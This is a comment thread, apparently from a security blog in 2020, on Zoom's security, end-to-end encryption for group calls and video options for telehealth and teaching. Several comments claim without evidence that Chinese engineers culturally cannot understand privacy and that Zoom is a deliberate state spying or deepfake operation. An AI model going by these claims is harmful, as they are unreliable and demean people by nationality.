And that is, indeed, what I was missing: something in the middle needs to be able to process this stuff, not just relay it between end-points.

Thank you!

Dave Crocker April 5, 2020 3:06 PM

Concerning end-to-end security in a group setting, and with well-founded fear I’m missing something/many-things basic — especially since your April 3, 2020 1:56 PM response on this was that one doesn’t do it:

  1. One of the comments seemed to think that it requires a direct connection between every source and every sink; it doesn’t. There is nothing wrong with relaying, a la and email list exploder, as long as the encryption is on the object and not the channel (and as long as the list server doesn’t corrupt the object. That is, the source encrypts the data and the relay relays without messing it up.
  2. The cost of the combinatorics for key exchange between the sources and sinks is arguably only one time, for each pair. The one-time exchange users private/public keys to exchange the session symmetric key. So, high setup cost, low operations cost. (Hmmm. It’s probably possible to make this even cheaper, if everyone on the session is using the same shared crypto key, then any one of the participants with it can give it to anyone that needs it.)

At the least, I’m opening the door for your adding some detail to help everyone else understand why this is a hard problem that these products aren’t going to solve or won’t solve easily or won’t solve at scale. You’re welcome. /d

Máté Wierdl April 5, 2020 3:47 PM

“My goal here is to summarize all of the problems and talk about solutions and workarounds.”

Is there a solution that would address live teaching? In other words, is there a (more) secure video conferencing software that would allow me to teach a class synchronously? Prerecorded classes are much worse, from a student’s viewpoint, and I try to provide an online experience which is somewhat close to brick and mortar teaching. (I am college prof)

Sancho_P April 5, 2020 3:58 PM

@Clive Robinson, (… @tfb, @Bob Paddock, @Dave Crocker)

Sorry, I do not understand your point:
”However the problem is, the mixing hub would be outside of the security perimeter, and it needs the “secret” keys for the central mixing hub to work. Because it has to be able to decrypt all of the incomming streams, mix them together, then reencrypt the result before sending it to all participants.”

Why would the mixing hub need to decrypt / reencrypt just to do it’s job?
Perhaps “mixing” is the keyword here, what do you think is this part?

I think of uploading encrypted stuff, anyone can download [1] and, having the “right” key, read it.
Good luck if not in possession of the (symmetric) key.
That leaves the key distribution unsolved, but the “mixer” wouldn’t need any knowledge.

Is your concern based on the mixer’s knowldege of metadata? Or in sharing the key?
(I agree on the single point of failure, DDOS, spreading confusion, …)

[1]To me it doesn’t matter if the provider actively shares the communication or “they” take it from transmission lines or whatever, we must assume if someone wants it they will have access to our content.
The provider providing the key is … useless at best.

Sancho_P April 5, 2020 4:02 PM

[… having the “right” key, read it.]
“read” should be read as parse, understand!

Clive Robinson April 5, 2020 6:17 PM

@ Sancho_P,

Why would the mixing hub need to decrypt / reencrypt just to do it’s job?

Because you have to do operations on the plaintext like “scaling and summation” that you can not do on ciphertext.

It’s easiest to start with audio.

As a general rule of thumb you adjust the gain of your microphone to line output signal so that it is close to full scale. This is so you get the best signal to noise ratio.

The job of an audio mixer is to take N signals adjust their levels downwards so that when they are summed together the output is the sum of N channels scaled to be as near full scale as possible.

It is this “N input scaled and summed output signal” that gets sent back to all N participants.

By definition of what encryption does these N inputs and single output can not be operated on as encrypted signals because the plaintext linear signal gets randomly mapped via the key to nonlinear ciphertext outputs. We do not currently have a practical way to do both multiplication (for scaling) and addition (for summing) under a single type of encryption.

So you have to decrypt, you don’t have any choice with the simple linear continuous case of audio. To combine N video signals is way more complicated and requires time compression and discontinuous operations both of which are nonlinear operations….

I could describe what you need to do but it’s long, complicated and trust me when I say “a thousand words would not replace a picture” or in this case three or four page diagram.

La Abeja April 5, 2020 7:37 PM

@Clive Robinson

Because you have to do operations on the plaintext like “scaling and summation” that you can not do on ciphertext.

I don’t want to interrupt you fine fellows’ discussion here, but there are methods of “holographic encryption” and “zero-knowledge computation” that can be performed directly on ciphertext.

In other words there are ways of having computations performed “in the cloud” e.g. without allowing them to know what they are, in effect, computing for you.

RSA and elliptic curve schemes exist for such purposes.

Clive Robinson April 5, 2020 8:11 PM

@ La Abeja,

I don’t want to interrupt you fine fellows’ discussion here, but there are methods of “holographic encryption” and “zero-knowledge computation” that can be performed directly on ciphertext.

As I went on to explain,

    We do not currently have a practical way to do both multiplication (for scaling) and addition (for summing) under a single type of encryption.

I mat well be a little out of date, so if you know of a “practical” Homomorphic encryption system for the likes of video sing out as it would be of interest.

PsychPoC April 5, 2020 10:25 PM

Greetings!

  • Backstory –

I’ve been ever averse to webcam interaction primarily because there are few assurances of privacy and security. Alas this isn’t trending better, with global data hoovering and analysis of facial and voice recognition, etc. To me the term ‘surveillance capitalism’ is a cover for capitalism as a front for surveillance. The corporate firewalls of proprietarism combined with secret legal processes provide nearly complete opacity. I firmly believe in an inherent human need for and right to personal privacy; that right is being waved away under the cover of mere profit; basically things over people.

As a computer scientist I presently find myself pressed into service to vet webcam capabilities. This is due to pro-bono work I have and continue to do for practitioners in psychological counseling. A few weeks ago I began to do some proof-of-concept investigation of these facilities for purposes of tele-counseling. The clinicians involved are in small private practices.

Mental health therapy is, like physical medicine, covered (in the US) by federal laws regarding privacy of information (e.g. HIPAA). Like so many modern federal laws, these statues are crafted in various ways to require clarification through litigation and not by careful regulation. Among other hazards this bias implies that there be actual and often serious injury in order to achieve momentum with which to seek clarity and some measure of remedy, yet no legal remedy can be restorative particularly in such matters. Only by taking all reasonable preventative measures do we have the best assurance of ‘do no harm’.

In mental health, absolute, complete, and truthful disclosure of the intimate details of one’s life is often the most direct (and maybe only) path to discovery and recovery. Such disclosure is also fraught with permanently ‘valuable’ information which could be used against the client. US citizens of a sufficient age can recall the events surrounding the illegal activities undertaken by the federal executive to breach confidentiality of one Daniel Ellsberg. One possessing sufficient technical understanding of modern communication and computing would be perversely disingenuous to disclaim that such breaches are now possible, swift and perhaps even automatic. Within the realm of any any security regime, not just communications, the need to evaluate any possible and consequential risk is de rigueur and not to be reflexively dismissed as paranoia and/or hyper-vigilance.

  • Proofs-of-concept –

In order to provide proper legally-supportable tele-health in the US one must conform to HIPAA. My understanding of conformance is that one can claim compliance, but that there is unfortunately no bonafide certification process (think: Underwriters Lab). Legally-defensible compliance can be sought through expensive audits by major accounting firms with computer security expertise, HITRUST certification, and perhaps more. In my view major issues are that these services are closed-source (‘secret’) coupled with the seemingly voluntary state of ‘certification’ (read: claim what you think you can, hoping to forestall litigation). Meanwhile services must enter into a Business Associate Agreement with the healthcare provider to protect the latter. (Some of the services even offer just an online, generated PDF once fees are paid.)

As mentioned above the target userbase is small private practice (read: shallow pockets.) Criteria are HIPAA BAA (obviously), end-to-end encryption, operation on Android and iOS [0], ease-of-use for both clinician and especially clients. Also a bias toward minimalism: prefer a simple voice+video interaction as other healthcare functions are already in place. Passphrase (one-time preferred), non-guessable contact naming, etc. Recording of sessions either unavailable or disablable. No collusion with Google Analytics, Facebook, etc.

Some solutions under initial consideration were:

Google Hangouts –
Google has a lengthy treatise on HIPAA usage. That tome nowhere claims HIPAA nor mentions a BAA. The clinician is on her/his own to evaluate and legally-defend safety of the complex of tools involved and/or interconnected. There are references to myriad knobs and settings in order to be ‘safe’, some of which are not the defaults. Use on any pre-existing Google-connected Android phone is likely wrongly configured and pre-compromised. Plus, this is Google (read: they’ll connect everyone to everyone, providers to all clients, etc.) [1] Closed-source. Not end-to-end encrypted.

GotoMeeting –
Closed-source. Claims HIPAA available. Not end-to-end encrypted. Collusion status unknown.

Mend –
Closed-source. HIPAA BAA available. End-to-end encryption unknown. Uses Google Analytics [1]. Claims to employ proprietary AI to reduce no-shows and improve revenues [2].

WebEx –
Owned by Cisco. Closed-source. HIPAA not claimed (per hipaajournal.com, WebEx must be fiddled by the user(s?) to attempt to be compliant – see above about the assumed risks by therapists for improper configuration.) Not end-to-end encrypted. Collusion status unknown.

Zoom –
Closed-source. HIPAA BAA available. Despite company weasel-wording, not end-to-end encrypted. Numerous security and privacy blunders now being discovered and reported weekly. End-point names can be guessed and passcodes are weak. One-time end-point tokens don’t appear to be supported. Colludes with Google Analytics and Facebook [1].

Still under consideration are:

doxy.me –
Quasi-open source (read: WebRTC browser-based, so one must scrutinize Javascript and trust browser security [3][4].) HIPAA BAA available. Sign-up Terms of Service briefly mention their Privacy Policy; the latter is a lengthy tome filled with referential ToS / PrivPol to a half-dozen contingent services [5] including Google Analytics and Amazon WebServices [1]. End-to-end encryption TBD.

jitsi –
Open source. Claims it can be stood-up in a few hours and be self-hosted (downside: clinician probably assumes all legal liability). Claims Android and iOS support. Robustness and ease-of-use TBD. Less likely to collude with anyone. Note: claims support for use on F-Droid based Android, so an expert user might avoid the Google Play driftnet; perhaps runs on e.g. LineageOS? [6]

PhysicianVisit –
Closed-source. Mature offering but loads of e-clinic collateral infrastructure (perhaps optional). HIPAA BAA compliant plus HITRUST certified. End-to-end encryption TBD. Uses Amazon AWS’ ‘secured private sensitive information’. Collusion TBD.

  • Epilog –

That’s where I am thusfar in this PoC. Hopefully this will prove informative to others. Comments welcome.

The COVID-19 pandemic is forcing numberless victims to be caught-up in the surveillance driftnet. Choosing between obtaining necessary healthcare and privacy is, to my mind, pure evil. As a US citizen I don’t generally approve of Presidential Executive Orders as I believe they shortcut the (unfortunately slow and now heavily-gamed) legislative process. But for this emergenscy, if the POTUS owned his cohones and had a functioning soul, he should issue an EO which prohibits collection of all collusive information by all tele-health solutions – full-stop. (Eventually real legislation should make such prohibition permanent, and be expanded to banking and other financial and governmental services.)

Even ‘just advertising’ and/or ‘business models du jour’ have miniscule standing alongside the needs of healthcare. There is no demonstrable therapeutic benefit to patients and clients from being subjected to advertising, targeted or otherwise – else there would be billboards, posters, flyers, and screens in every waiting, exam, recovery, and therapy room. Moreso, there is negative therapeutic benefit to stalking patients and clients – whether overt (from being pilloried in the town square to dox’ed and heckled in online media) – or covert (e.g. being silently red-lined for future care, being creepily-followed by targetted ads related to one’s healthcare challenges, etc.). ‘Just advertising’ is both stress-inducing and has a chilling effect on candor. No positive outcomes override such negatives. And it’s worse still if non-advertising surveillance is afoot.

There is a more precise term for Surveillance without probable cause nor informed consent: stalking.

  • Notes ‘Clive-style’ –

[0] Unlikely that the Android platforms themselves can be trusted with sensitive information [6]. iOS is closed-source. Unfortunately, what else is there?
[1] I consider Google Analytics, Facebook interactions, and whatever touches Amazon to be spyware, unless proven otherwise.
[2] Seems to imply deep inspection of the clinician/client relationship.
[3] As noted by others here, Firefox is open but unlikely to be secure nor hardenable.
[4] The Android version requires Google Chrome, too.
[5] I call the entirety of floating ToS & PrivPol, either by the provider or by reference, as ‘stealthy Animal Farm lock-in’: the user gets to review legalese at sign-up (if allsuch can even be fully collected in snapshot) then thereafter must vigilantly monitor for ‘updates’; such changes can prove untenable but require immediate abandonment to avoid. And, if the provider has been doing something outside their prior agreement, just how would the user prove the timing of such versus the new Terms?
[6] Alas even if one were to rely solely on reproducable builds on an Android-capable smartphone, there are still many issues of sub-o/s vulnerabilities (e.g. carrier firmware pushes, lack of trusted kernel and enclaves such as sel4, out-of-order execution side-channel leaks, etc.) on these platforms. “Oh what a world?!?” -or is it- “We’re not worthy! We suck!”

** UPDATE: I began writing this more than a day ago, so I have yet to read and integrate information in most of the comments.

Unfixable April 6, 2020 12:01 AM

Zoom is unfixable.

Chinese CEO, Chinese engineering.

They simply did not understand that they were doing anything wrong.

Their understanding of privacy and security is just so vastly different to ours.

After the 90 days “we’ll fix everything” period expect to keep hearing about these issues.

(It’s the same with Chinese consumer electronics companies. For them, it’s not shameful at all to clone the latest Western products. It’s a cultural thing. They simply don’t understand that it’s not ok.)

Clive Robinson April 6, 2020 4:32 AM

@ PsychPoC,

You cover many peoples concerns in your comment.

Unfortunately those who set up the likes of “emergancy helplines” and “web page” equivalants, are often unaware of their obligations with regards communications.

In the UK there was an online “Crisis line” for patients and their carers. It asked quite a few invasive and identifing pieces of information. However it did not use HTTPS or any other security precautions that I could see…

It’s unfortunately a side effect of non “Professional Status” in all asspects of online development. Hopefully nobody on this blog should be surprised at the number of “self taught” developers who “pick up” a “learn web language XXX in 24hours” and just hammer their idea out and think that it is acceptable practice. Perhaps if they saw people reading “Learn Brain Surgery in 24hours” being read on public transport and in the discount windows of book shops they might just get a feeling for the problem.

There are reasons why certain “trades” require “Proffessional Certification” to very high standards over several years of full time and overseen practical education, that is kind of covered by the old “First do no harm” requirment.

It’s realy time that ICT got serious about “Chartered Engineer” status and proper education not the current “industry certifications”.

With regards,

– Notes ‘Clive-style’ –

I tip my hat to you 🙂

Chao April 6, 2020 11:38 AM

Thanks for the great summary! A very good read.

Or from Chinese programmers slipping backdoors into the code at the request of the government.

However, the above sounds unfair to me without supporting evidence, but just the fact that Zoom hired developers in China mainland; There are a log of U.S. companies hired a lot of Chinese programmers in all industries, located both in U.S. and China.

lurker April 6, 2020 3:11 PM

@Clive

Because you have to do operations on the plaintext like “scaling and summation” that you can not do on ciphertext.

Sorry, another simple mind missing something… In a multiparty conference the individual actors appear in separate panes on screen: surely this lends itself to TDM of the encrypted streams, with all the necessary descrambling done at the receiving end, no summing or balancing required at some intermediate point. Sure, it would be rather difficult to do with a 40Mhz 386, which was state of the art when I first looked at this topic, but nowadays?

A staged conference, where only one speaker at a time need be on screen; or teaching where only the teacher needs see all other students simultaneously; suggest that stream control should be done “locally”, ie. not by a third party.

The main function of the “hub” is de/allocation of TDM slots as parties leave/join the conference.

Thunderbird April 6, 2020 4:54 PM

Seems like if you wanted to support a moderate number of participants that could all talk but not necessarily send video at once, you could come up with a protocol that was end-to-end encrypted, taking advantage of the fact that most parties would not be talking at one time and only sending the unmuted streams through a central relay point. You could even add video if each end had to produce its own thumbnail-sized stream that could be merged on each client.

But I don’t see any way you would morph a server-based wheel-and-spoke solution into an end-to-end-encrypted solution. Especially if it involves trusting a profit-driven company not to stick their spoon in the soup.

Sancho_P April 6, 2020 5:22 PM

@Clive Robinson, @lurker, @Thunderbird

I don’t have any technical knowledge of a real time video conferencing system.
If there is any need of a mixer, I had expected it to be at the clients, because one and the same shoe doesn’t fit everybody.

However, your thinking is likely closer to reality:
A central, server side mixer (if!) would chain the group to one and the same system + server, which is true with all contemporary systems (all eggs in one basket, with ads and invading privacy for free).

My thinking (but not thought for video conference systems) would allow to select several encrypted streams from different sources to be combined at the client to one message.
From the point of bandwidth I wouldn’t see any difference, but the client lock in would be lost, so that’s a no go for big business.

willowhaus April 7, 2020 10:22 AM

Surprised you didn’t mention this: https://objective-see.com/blog/blog_0x56.html

Wardle’s work shows that Zoom is abusing deprecated methods in their macOS installer in order to subvert built-in OS security measures. They are serial offenders, who clearly care more about roping in more users than actually taking care of them.

jenger April 8, 2020 7:14 AM

Is the FedRamp-certified ZoomGov dramatically better?

I would hope the privacy flaws would be addressed, and even the cipher strength, however I find it a stretch to think that all of the issues outlined in the article had been effectively dealt with, especially the developer angle.

WDYT?

unfixable April 8, 2020 6:51 PM

Wow, somebody(unfixable) above said the universal truth here. Very true. Most western doesn’t seem to get it.

Zoom is unfixable.

Chinese CEO, Chinese engineering.

They simply did not understand that they were doing anything wrong.

Their understanding of privacy and security is just so vastly different to ours.

After the 90 days “we’ll fix everything” period expect to keep hearing about these issues.

(It’s the same with Chinese consumer electronics companies. For them, it’s not shameful at all to clone the latest Western products. It’s a cultural thing. They simply don’t understand that it’s not ok.)

RayK April 8, 2020 9:31 PM

Thought that you’d like to see this.

I was having a pissing contest with a journalist who was inappropriately congratulating Zoom weeks weeks ago. I called him out and have spent literally 20+ hours trying to educate him.
This morning I got a think you note from him. But I did not read it until after I sent him a final, so long message and a summary of why he had been right to congratulate Zoom, but only in a prescient way.


Subject: You were exactly right in a prescient way – and so long

Zoom is finally doing the right thing, but they do not yet have any idea that they did an extremely insightful thing by recruiting NTT (Japanese Telecom giant) to join their new security advisory committee.

Only those of use who have worked for NTT know the nits and grits of their outstanding, world’s most famously successful security program.

What NTT is going to do to Zoom is exactly what the did to themselves decades ago and what they continue to do to their customers: Shit can their current brain damaged organizational and technical structures and build them what is called an Information Security Management System (ISMS).

This is the only security framework that has risen to the top because it so very well brings security to organizations in the very best complete, rigorous and cost effective manner.

So, there is hope for them, but it will be very slow, pain full and hugely expensive ordeal, that will take a number of years to complete.

So, anyway, I thought that you’d get a kick out of what seems to be a funny joke, but is indeed food to serious thought.


… In parting, I’d like to tell you that many of us are really scratching our collective heads about what “the royal we” are uncovering about their Chinese ownership and staff, but also the convoluted web of Chinese companies that, in-total, are Zoom’s real owners.

Call us paranoid, but some us are stroking our beards about the two following things as a result of the paragraph above:

1) Wow, this Zoom thing is actually a superb example of the kind of things that intelligence and defense agencies just love.

Consider their predominate comments about Google when it first hit the search scene: Wow! This is a superlative tool and a real boon to us!

2) Us security nerds think in the same way about Zoom.

3) The Chinese intelligence and defense agencies are the world’s second best behind ours.

Wow! We are stroking our beards and wondering:

What if Zoom turns out to be a Chinese intelligence operation?

On that note, I close with a tag line that I am well known to use. It is an adaptation of the famous Dr. Strange Love movie quote:

Just because you are paranoid does not mean that they are out to get you.

My adaption offers a subtle twist on this. I say:

Just because you are not paranoid does not mean that they are not out to get you.

Over the years, people have loved to hear that, especially since I used it as the summary that I closed with when I presented my assessment and audit reports to top management at the end of my gigs.

BentFranklin April 10, 2020 10:18 AM

I’m reasonably confident any world power can get security bugs introduced into software even when written in the United States.

I prefer Debian April 11, 2020 6:27 PM

@RRD

In Ubuntu, using a run command or shell command line:
sudo apt autoremove

… will remove any packages that may have been required by some specific package and were left behind when the only that specific package was removed.

jack baker April 16, 2020 12:55 AM

It does not matter if the CEO is a naturalized citizen or not. What counts is where the programming team is headquartered. And we all know Zoom programming headquarter is in China. So what if they have a marketing, administrative office in Silicon Valley. Who is naive enough that thinks Chinese government does not have a spy in Zoom company, in the best scenario and at worst is in bed with Zoom company? People wake up! Zoom is not stupid enough to leave the security open like this. The chances are it was left open on purpose so all your videos will get recorded by Chinese government. They already have full files on all their citizens and now they have it on all Americans that have used Zoom for video conferencing. Chinese government is known to use facial recognition to spy on it’s own citizen to know which places they go and their activities captured on cameras. Zoom has allowed and continues to allow Chinese communist government to capture your voice, your unique moves from Zoom video conferencing, without you ever knowing. AI technology using High-tech deception of ‘deepfake’ videos of you acting and saying any thing that the Chinese government wants you to say using your own voice and natural movements can be accomplished flawlessly just by a small video and audio clip. U.S. government, Google understand this. But most people don’t because they feel they are not saying anything important on the video chat for anyone to care to listen. But it’s not what you say. It’s about creating a virtual you using deep fake videos that you should be concerned about.

Jen McQ April 17, 2020 9:04 PM

I was involved in a meeting that was Zoombombed. There was porn and insolent young males spewing idiocies, although offensive, I’ll get over it. My computer being hijacked momentarily was much more disconcerting. It was password protected. The info for attending the meeting was shared via fb messenger.

kar3 April 18, 2020 6:46 PM

Quote: The company collects a laundry list of data about you, including user name, physical address, email address, phone number, job information, Facebook profile information, computer or phone specs, IP address, and any other information you create or upload.

I’ve been using zoom for a couple of months on my Android phone and have not had to hand over any information to them (or to anybody else on my phone; I don’t use any google services and use open-source tools like F-Droid for apps. Of course, others have to be hosting the meeting and that’s fine by me. On the app permissions front, zoom does not ask for permissions to access contacts, location, or calendar–only phone and camera–unlike competing products from Microsoft, Cisco, and others’ whose products I wouldn’t touch with a 10 foot pole (i.e. google). zoom is fine for non-confidential conversations, meetups, etc. and it’s easy to use even for seniors and others who are technically not the most savvy.

As an old-timer some of the negative stories that keep popping up with regularity on sites like NPR about zoom’s issues reminds me of the FUD that IBM used to specialize in. We’ll be in a much nastier world if the vast majority of this business ended up in the walled monocultural gardens of Big Tech ( https://en.wikipedia.org/wiki/Big_Tech ).

Debora Weber-Wulff April 20, 2020 12:35 PM

Can we please calm down now? Zoom has been making a lot of progress recently.

I am a professor now teaching via Zoom. I have tried a binload of other systems, and they are pretty much all back in the bin…

  • Jitsi is fine for one-on-one discussions like in office hours. Since this is often involving personal information, I’ll take the bad usability and video/audio quality. My lab engineers use it to collaborate during these times, and lab meetings (4 people) work well. I recently tried to hold a meeting with 6 thesis students, it just did not scale when we tried to be sharing a screen (mine), so we abandonded ship and went to Zoom.
  • BigBlueButton has some of the functionality of Zoom and none of the usability. It kind of sort of works, as long as you have less than 20 people. For a lecture class, it is not stable enough.
  • WebEx – a Cisco product – also has many usability issues. I attended a conference last week with 40+ people, it sort of worked, but we had numerous crashes and problematic issues.
  • Twitch – no.
  • Zoom just works. It lets me focus on teaching, and not have to deal with the technology. I have used it for a church service with older folks (as mentioned above, they can call in and it just works for them), I have attended webinars with 250+ people, and I use it for my normal lectures. I really don’t care if China or the NSA attends my lectures or not. People who publish a link or meeting number on the open web and are surprised to get sickos dropping in can’t really blame the software for their own misuse of the product. There are now so many defaults set up to protect non-IT people, and we can turn them off if we want to. And from now you can also determine in what area the traffic is going (Europe, China, USA, etc). You can also disable screen sharing for others and then let them do it as needed.

I’ll stick with Zoom, as I have enough other stuff to deal with this semester besides teaching at a distance. I’ll not use it if I am planning a revolution or have special security issues. I would not use it for a cabinet meeting, but that’s just me.

kar3 April 20, 2020 6:07 PM

I’m pretty certain most of the tools listed above can scale up to handle meetings of 20-40 (or even more), but they do require settings to be tweaked (e.g. low-bandwidth mode; QoS settings on LAN, etc.) or minor adjustments to be made (e.g. turning off video to improve sound quality if speakers’ picture is not needed). Chicago Philosophy Meetup has regular meetings using jitsi where 20+ participate:

https://www.meetup.com/The-Chicago-Philosophy-Meetup/events/269953603/

Kevin Smyth April 22, 2020 11:58 AM

That the Zoom people know nothing about security is obvious from the analysis. But is encrypting the stream really the issue? It seems to me that the biggest weakness is having guessable invite strings. I assume that hackers are then inviting themselves to conferences and posting their own videos. Since the streams are not end-to-end encrypted (in fact I don’t know how this would work) their (encrypted) streams from the Zoom server are as acceptable as anyone else’s.
Another improvement would be for the moderator to have an agreed participation list which gets locked down when the conference starts.

These measures would not be that difficult to implement. But would they be enough I wonder?

Don’t shove it, but Zoom it April 22, 2020 4:06 PM

Aside from just saying no to Zoom what are the user’s pros and cons security wise of the user:

1) calling in from their smartphone on mute with tape over camera

2) joining using Firefox, Brave, or other non Chrome browser with tape over camera, if possible

3) Using MacOS, iOS, Android, Windows 10, etc., app or whatever

4) Try linux Zoom, with or without running it using VirtualBox

5) FAQs or Best Practices

6) I assume FaceTime and Jitsi are better alternatives, when possible. Anything else?

7) Does it work with Tor in general? For example, using Tails.

8) audio more important than visuals when Zooming It

KidsRAlright May 3, 2020 7:54 PM

@Debora Weber-Wulff

RE: BigBlueButton;

Debora,

I’m interested in why you’ve vocally dismissed this venerable solution, as it appears to have been reliably used around the world in literally thousands of schools and universities for lectures/seminars as part of the Moodle Learning Management System for web conferencing for well over a decade. Like Moodle, BBB is fully open source and built on the LAMP stack, with affordable turnkey SaaS hosting by the nonprofit organization that maintains the Moodle code.

The BBB hosted solution allegedly supports sessions with up to 100 simultaneous web conference users, but is dependent on server load, high-availability configuration, etc.

Our school is considering Moodle/BBB for a desperately needed distance learning solution, as Zoom has been outlawed for schools in New York (for good protective reasons, particularly considering children and minors’ private data protection concerns).

Is it possible your school’s BBB implementation may be flawed or not properly maintained? I’ve heard of schools with hosting implementations from yesteryear, that were marginally usable and expensive to maintain, that benefit greatly by hosting in a modern cloud environment for a fraction of the cost.

KRA

Maneesh June 27, 2020 12:12 PM

I had been using zoom from past 2 months for my meetings but i have uninstalled it since, i came to know that many people are talking negative about its security and it’s a Chinese application.

Leave a comment

Login

Allowed HTML <a href="URL"> • <em> <cite> <i> • <strong> <b> • <sub> <sup> • <ul> <ol> <li> • <blockquote> <pre> Markdown Extra syntax via https://michelf.ca/projects/php-markdown/extra/

Sidebar photo of Bruce Schneier by Joe MacInnis.